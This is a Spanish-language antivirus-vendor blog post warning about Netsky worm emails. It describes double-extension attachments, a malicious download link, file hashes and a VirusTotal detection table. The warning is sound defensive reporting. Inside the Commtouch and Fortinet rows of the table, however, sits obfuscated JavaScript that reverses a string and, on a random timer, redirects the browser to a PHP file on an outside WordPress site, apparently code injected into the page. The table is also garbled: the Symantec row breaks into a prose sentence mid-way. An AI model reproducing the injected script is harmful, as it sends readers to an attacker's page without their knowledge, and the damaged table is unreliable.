NUEVO ENVIO DE EMAILS ADJUNTANDO ARCHIVOS INFECTADOS CON EL NETSKY

Publicado el 7 marzo 2014 ¬ 11:49 amh.mscComentarios desactivados en NUEVO ENVIO DE EMAILS ADJUNTANDO ARCHIVOS INFECTADOS CON EL NETSKY

El archiconocido virus NETSKY, aun  sigue propagandose masivamente, anexandose a los mails con diferentes técnicas en los ficheros, la de doble extension .TXT.EXE  que para windows aparenta ser un TXT cuando realmente es un EXE, y otra, con extension .SCR (igualmente ejecutable) y en ambos casos con icono de documento de texto (WORDPAD)

 

Hemos recibido hoy dos mails (uno de cada) con dicho virus:

 

PRIMER MAIL MALICIOSO:
______________________
Asunto: Important m$6h?3p
De: <falso remitente> (spoofing)
Fecha: 07/03/2014 09:45
Para: <destinatario>

Please r564g!he4a56a3haafdogu#mfn3o

<SMTP Error #201>

+++ Attachment: No Virus found
+++ Bitdefender AntiVirus – www.bitdefender.com

ANEXADO : important.txt.exe  (con icono de wordpad)

FIN DEL PRIMER MAIL MALICIOSO.
_____________________________

 

Y el otro mail , tambien  con el NETSKY, es mas sofisticado, ofrece un enlace para acceder al fichero malware:

SEGUNDO MAIL MALICIOSO:
_____________________
If the message will not displayed automatically,
follow the link to read the delivered message.

Received message is available at:
www.<destinatario>/inbox/sat/read.php?sessionid-27801 ->(enlace malicioso)

y en este caso descarga este fichero:

message.scr (tambien con icono de wordpad)

______________________________
FIN DEL SEGUNDO MAIL MALICIOSO

en ambos casos los ficheros tienen el mismo MD5, y el preanalisis de virustotal ofrece el siguiente informe:

MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: important.txt.exe.vir
Detecciones: 48 / 50
Fecha de análisis: 2014-03-07 09:49:01 UTC ( hace 0 minutos )

1 17

 

Antivirus  Resultado  Actualización
AVG  I-Worm/Netsky  20140306
Ad-Aware  Win32.Generic.497472  20140307
Agnitum  I-Worm.NetSky!4NWvXC1SwiU  20140307
AhnLab-V3  Win-Trojan/Fsg.29568  20140307
AntiVir  Worm/Netsky.AP  20140307
Antiy-AVL  Worm[Email]/Win32.NetSky  20140307
Avast  Win32:Netsky-AF [Wrm]  20140307
Baidu-International  Worm.Win32.NetSky.AtcC  20140307
BitDefender  Win32.Generic.497472  20140307
Bkav  W32.SkyNetP.Worm  20140306
CAT-QuickHeal  W32.NetSky.P  20140307
CMC  Generic.Win32.3018e99857!MD  20140307
ClamAV  Worm.NetSky-14  20140307
Commtouch  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm  20140307
F-Secure  Win32.Generic.497472  20140307
Fortinet  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM  20140307
McAfee-GW-Edition  Heuristic.BehavesLike.Win32.Suspicious-PKR.G  20140307
MicroWorld-eScan  Win32.Generic.497472  20140307
Microsoft  Worm:Win32/Netsky.P@mm  20140307
NANO-Antivirus  Trojan.Win32.NetSky.idzx  20140307
Norman  Netsky.P  20140307
Panda  W32/Netsky.AE.worm  20140307
Qihoo-360  Win32/Worm.d2e  20140307
Rising  PE:Trojan.Win32.Generic.129CEE65!312274533  20140306
SUPERAntiSpyware  Worm.Netsky-P  20140307
Sophos  W32/Netsky-P  20140307
Symantec  todas las direcciones falseando el remitente y utilizando una de las direcciones de la lista como si fuera el remitente real, sin serlo, claro (SPOOFING), con lo que dicho falso remitente recibe las devoluciones o quejas de los usuarios a los que se les ha enviado el virus, mientras que el que realmente lo ha hecho por estar infectado, no se entera.

Actualmente lo controlan casi todos los antivirus, por lo que la infección/propagacion será efectuada por alguien que no tenga instalado uno de dichos antivirus o que no lo tenga residente.

En cualquier caso nuestro ELINETSA actual ya controla y elimina dicho virus, por lo que incluso en ordenadores sin antivirus lo detectaría y eliminaría.

Pero como en cada oleada de propagacion de dicho virus, habrá infectados y afectados, aun sin estar infectados, por la devolucion de mails y quejas de quien habrá recibido “su” mail.

saludos

ms, 7-3-2014

 

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Virus, , , , , , , , , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies